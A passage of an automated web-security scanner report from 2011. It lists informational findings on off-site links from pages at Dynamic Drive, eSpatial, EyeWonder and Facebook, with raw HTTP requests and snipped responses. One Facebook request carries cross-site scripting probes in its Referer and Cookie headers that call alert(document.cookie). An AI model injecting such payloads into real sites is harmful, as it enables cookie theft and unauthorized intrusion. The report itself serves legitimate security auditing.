Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>
   CarMax - Browse used cars and new cars online
...[SNIP]...
<li><a target="_blank" href="https://epayment.epymtservice.com/epay.jhtml?productCode=AUTHORIZED_PRODUCT&billerId=MAX&billerGroupId=CAR">Make a Payment</a>
...[SNIP]...
<li><a onclick="return showpopup(this);" rel="popup 600 960" href="http://www.twitter.com/CarMax"><div class="tw">
...[SNIP]...
<li><a onclick="return showpopup(this);" rel="popup 600 960" href="http://www.facebook.com/CarMax"><div class="fb">
...[SNIP]...
<li><a target="_blank" href="http://phx.corporate-ir.net/phoenix.zhtml?c=125417&p=irol-irhome">Investor Relations</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=232927&p=irol-overview">Pressroom</a>
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script><noscript><div style="display:inline;"><img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1009281771/?label=D0eOCK2u4AEQ69Wh4QM&amp;guid=ON&amp;script=0"/></div>
...[SNIP]...

20.566. http://www.dynamicdrive.com/forums/showthread.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dynamicdrive.com
Path:   /forums/showthread.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.dynamicdrive.com/forums/showthread.php?t=39177&highlight=smooth
The response contains the following links to other domains:
  • http://acreativellc.com/newsite/nav.php
  • http://acreativellc.com/newsite/navA/nav.php
  • http://del.icio.us/post?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
  • http://digg.com/submit?phrase=2&url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
  • http://img229.imageshack.us/img229/8436/20081221145133cruw5.png
  • http://www.atlanticinkjet.com/canon.asp
  • http://www.big-boards.com/
  • http://www.crucialp.com/
  • http://www.eukhost.com/
  • http://www.flashmint.com/
  • http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
  • http://www.ozzu.com/
  • http://www.phpbbhacks.com/
  • http://www.pixel2life.com/
  • http://www.satelliteinternetpros.com/
  • http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
  • http://www.windowshostingasp.net/
  • http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js?v=381
  • http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js?v=381

Request

GET /forums/showthread.php?t=39177&highlight=smooth HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:17 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: bblastvisit=1295913557; expires=Tue, 24-Jan-2012 23:59:17 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 23:59:17 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 82811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...
<!-- / CSS Stylesheet -->

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js?v=381"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js?v=381"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<br />
* For example of the problem, see: <a href="http://acreativellc.com/newsite/nav.php" target="_blank">http://acreativellc.com/newsite/nav.php</a>
...[SNIP]...
<br />
* It works fine with one sub-menu arrow, as seen on <a href="http://acreativellc.com/newsite/navA/nav.php" target="_blank">http://acreativellc.com/newsite/navA/nav.php</a>
...[SNIP]...
<br />
If I move cursor down on to one of the dropdown elements and then move the cursor quickly back up, part of the shadow remains painted on the screen. See <a href="http://img229.imageshack.us/img229/8436/20081221145133cruw5.png" target="_blank">http://img229.imageshack.us/img229/8...45133cruw5.png</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">
   
       <a href="http://del.icio.us/post?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&amp;title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_delicious.gif" border="0" alt="Submit Thread to del.icio.us" class="inlineimg" /></a>
   
   <a href="http://del.icio.us/post?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&amp;title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">del.icio.us</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">
   
       <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&amp;title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_stumbleupon.gif" border="0" alt="Submit Thread to StumbleUpon" class="inlineimg" /></a>
   
   <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&amp;title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">StumbleUpon</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">
   
       <a href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&amp;title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_google.gif" border="0" alt="Submit Thread to Google" class="inlineimg" /></a>
   
   <a href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&amp;title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">Google</a>
</li><li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">
   
       <a href="http://digg.com/submit?phrase=2&amp;url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&amp;title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_digg.gif" border="0" alt="Submit Thread to Digg" class="inlineimg" /></a>
   
   <a href="http://digg.com/submit?phrase=2&amp;url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&amp;title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">Digg</a>
...[SNIP]...
<div id="footer" style="font-size: 12px; text-align: center"><a href="http://www.crucialp.com/" target="_partners">Dedicated Hosting</a> |
<a href="http://www.ozzu.com/" target="_partners">Developer Forum</a> | <a href="http://www.eukhost.com/" target="_partners">Website Hosting</a> | <a href="http://www.pixel2life.com/" target="_partners">Pixel2life</a> | <a href="http://www.phpbbhacks.com" target="_partners">phpBBHacks.com</a> | <a href="http://www.atlanticinkjet.com/canon.asp" target="_partners">Canon Inkjet Cartridges</a> | <a href="http://www.big-boards.com/" target="_partners">Forums</a> | <a href="http://www.flashmint.com" target="_partners">Flash Templates</a> | <a href="http://www.windowshostingasp.net/" title="ASP.NET Hosting" target="_partners">ASP.NET Hosting</a> | <a href="http://www.satelliteinternetpros.com" target="_partners">Satellite Internet</a>
...[SNIP]...

20.567. http://www.espatial.com/contact/live-trial-adwords

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.espatial.com
Path:   /contact/live-trial-adwords

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.espatial.com/contact/live-trial-adwords?utm_source=Google&utm_medium=PPC&kw=erdas%20extensions%20for%20arcgis&utm_campaign=Competitors-Competitor_Companies/
The response contains the following links to other domains:
  • http://gmpg.org/xfn/11
  • http://t2.trackalyzer.com/trackalyze.js
  • http://www.googleadservices.com/pagead/conversion.js
  • http://www.googleadservices.com/pagead/conversion/1043883294/?label=NFmCCPie9AEQnsrh8QM&guid=ON&script=0

Request

GET /contact/live-trial-adwords?utm_source=Google&utm_medium=PPC&kw=erdas%20extensions%20for%20arcgis&utm_campaign=Competitors-Competitor_Companies/ HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31461

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification" content="c-mJZiRXofVWW1EmyqGE83W5hKB3BWiCPKiilXJEPsk" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" type="text/css" media="all" href="http://www.espatial.com/wp-content/themes/espatial/960.css" />
...[SNIP]...
<br />
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1043883294/?label=NFmCCPie9AEQnsrh8QM&amp;guid=ON&amp;script=0"/></div>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.568. http://www.eyewonderlabs.com/ct.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eyewonderlabs.com
Path:   /ct.cfm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.eyewonderlabs.com/ct.cfm?ewbust=0&file=http://cdn.eyewonder.com/100125/767769/custom/135737/57224923/NOSCRIPTfailover.jpg&eid=57224923&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a99/3/0/%2a/w%3B233959639%3B0-0%3B0%3B57224923%3B2321-160/600%3B40054263/40072050/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Eaopt%3D0/ff/ff/ff%3B%7Efdr%3D234359717%3B0-0%3B1%3B42955348%3B2321-160/600%3B40013631/40031418/1%3B%3B%7Eokv%3D%3Bsz%3D160x600%3Bfmzid%3D2673%3B%3Bfmcls%3DATF%3Btile%3D1%3Bqcseg%3DD%3Bqcseg%3DT%3Bqcseg%3D2891%3Bqcseg%3D2867%3Bqcseg%3D2866%3Bqcseg%3D2865%3Bqcseg%3D2363%3Bqcseg%3D2362%3Bqcseg%3D2355%3Bqcseg%3D2353%3Bqcseg%3D2352%3Bqcseg%3D2349%3Bqcseg%3D2339%3Bqcseg%3D1286%3Bqcseg%3D1160%3Bqcseg%3D1159%3Bqcseg%3D1156%3Bqcseg%3D1149%3Bqcseg%3D1148%3Bqcseg%3D983%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://network4g.verizonwireless.com/
The response contains the following link to another domain:
  • http://ad.doubleclick.net/click;h=v8/3a99/3/0/*/w;233959639;0-0;0;57224923;2321-160/600;40054263/40072050/1;;~okv=;pc=[TPAS_ID];;~aopt=0/ff/ff/ff;~fdr=234359717;0-0;1;42955348;2321-160/600;40013631/40031418/1;;~okv=;sz=160x600;fmzid=2673;;fmcls=ATF;tile=1;qcseg=D;qcseg=T;qcseg=2891;qcseg=2867;qcseg=2866;qcseg=2865;qcseg=2363;qcseg=2362;qcseg=2355;qcseg=2353;qcseg=2352;qcseg=2349;qcseg=2339;qcseg=1286;qcseg=1160;qcseg=1159;qcseg=1156;qcseg=1149;qcseg=1148;qcseg=983;;~aopt=2/0/ff/0;~sscs=?http://network4g.verizonwireless.com/

Request

GET /ct.cfm?ewbust=0&file=http://cdn.eyewonder.com/100125/767769/custom/135737/57224923/NOSCRIPTfailover.jpg&eid=57224923&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a99/3/0/%2a/w%3B233959639%3B0-0%3B0%3B57224923%3B2321-160/600%3B40054263/40072050/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Eaopt%3D0/ff/ff/ff%3B%7Efdr%3D234359717%3B0-0%3B1%3B42955348%3B2321-160/600%3B40013631/40031418/1%3B%3B%7Eokv%3D%3Bsz%3D160x600%3Bfmzid%3D2673%3B%3Bfmcls%3DATF%3Btile%3D1%3Bqcseg%3DD%3Bqcseg%3DT%3Bqcseg%3D2891%3Bqcseg%3D2867%3Bqcseg%3D2866%3Bqcseg%3D2865%3Bqcseg%3D2363%3Bqcseg%3D2362%3Bqcseg%3D2355%3Bqcseg%3D2353%3Bqcseg%3D2352%3Bqcseg%3D2349%3Bqcseg%3D2339%3Bqcseg%3D1286%3Bqcseg%3D1160%3Bqcseg%3D1159%3Bqcseg%3D1156%3Bqcseg%3D1149%3Bqcseg%3D1148%3Bqcseg%3D983%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://network4g.verizonwireless.com/ HTTP/1.1
Host: www.eyewonderlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Tue, 25 Jan 2011 13:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://ad.doubleclick.net/click;h=v8/3a99/3/0/*/w;233959639;0-0;0;57224923;2321-160/600;40054263/40072050/1;;~okv=;pc=[TPAS_ID];;~aopt=0/ff/ff/ff;~fdr=234359717;0-0;1;42955348;2321-160/600;40013631/40031418/1;;~okv=;sz=160x600;fmzid=2673;;fmcls=ATF;tile=1;qcseg=D;qcseg=T;qcseg=2891;qcseg=2867;qcseg=2866;qcseg=2865;qcseg=2363;qcseg=2362;qcseg=2355;qcseg=2353;qcseg=2352;qcseg=2349;qcseg=2339;qcseg=1286;qcseg=1160;qcseg=1159;qcseg=1156;qcseg=1149;qcseg=1148;qcseg=983;;~aopt=2/0/ff/0;~sscs=?http://network4g.verizonwireless.com/
Cache-Control: private
Content-Type: text/html

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://ad.doubleclick.net/click;h=v8/3a99/3/0/*/w;233959639;0-0;0;57224923;2321-160/600;40054263/40072050/1;;~okv=;pc=[TPAS_ID];;~aopt=0/ff/ff/ff;~fdr=234359717;0-0;1;42955348;2321-160/600;40013631/40031418/1;;~okv=;sz=160x600;fmzid=2673;;fmcls=ATF;tile=1;qcseg=D;qcseg=T;qcseg=2891;qcseg=2867;qcseg=2866;qcseg=2865;qcseg=2363;qcseg=2362;qcseg=2355;qcseg=2353;qcseg=2352;qcseg=2349;qcseg=2339;qcseg=1286;qcseg=1160;qcseg=1159;qcseg=1156;qcseg=1149;qcseg=1148;qcseg=983;;~aopt=2/0/ff/0;~sscs=?http://network4g.verizonwireless.com/">here</a>
...[SNIP]...

20.569. http://www.facebook.com/apps/application.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /apps/application.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/apps/application.php?id=62945690879
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css
  • http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css
  • http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
  • http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/oPbBLZNMjVJ.css
  • http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

GET /apps/application.php?id=62945690879 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=-yM75; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:18 GMT
Content-Length: 154403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/oPbBLZNMjVJ.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="alternate" type="application/rss+xml" title="Star Scene | The Daily Star | Lebanon" href="/feeds/page.php?format=atom10&amp;id=62945690879"/>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

20.570. http://www.facebook.com/connect/connect.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/connect/connect.php?%20id=62945690879&connections=10&stream=
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
  • http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1286.snc4/173660_836605415_3845318_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173827_767025706_4593919_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1311.snc4/173912_556975239_6818246_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161579_1626860566_3084878_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161584_1593614738_4300580_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1344.snc4/161497_688924697_7167805_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1345.snc4/161576_678745082_6012654_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs226.ash2/49138_697780598_7479716_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs329.snc4/41538_100000492372876_631497_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50287_62945690879_7080493_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs719.ash1/161585_100001158781561_3653594_q.jpg
  • http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
  • http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css

Request

GET /connect/connect.php?%20id=62945690879&connections=10&stream= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x590

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 22:25:11 GMT
Content-Length: 11860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/apps/application.php?id=62945690879" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50287_62945690879_7080493_q.jpg" alt="Star Scene | The Daily Star | Lebanon" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1311.snc4/173912_556975239_6818246_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=836605415" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1286.snc4/173660_836605415_3845318_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=678745082" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1345.snc4/161576_678745082_6012654_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/miofeghali" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1344.snc4/161497_688924697_7167805_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161579_1626860566_3084878_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/nancy.aslan" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173827_767025706_4593919_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000492372876" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs329.snc4/41538_100000492372876_631497_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/paty.kfoury" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161584_1593614738_4300580_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001158781561" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs719.ash1/161585_100001158781561_3653594_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=697780598" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs226.ash2/49138_697780598_7479716_q.jpg" /><div class="name">
...[SNIP]...

20.571. http://www.facebook.com/connect/connect.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/connect/connect.php?+id=62945690879&connections=10&stream
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
  • http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
  • http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
  • http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173827_767025706_4593919_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1311.snc4/173912_556975239_6818246_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161579_1626860566_3084878_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161584_1593614738_4300580_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1344.snc4/161497_688924697_7167805_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1345.snc4/161576_678745082_6012654_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs226.ash2/49138_697780598_7479716_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs329.snc4/41538_100000492372876_631497_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50287_62945690879_7080493_q.jpg
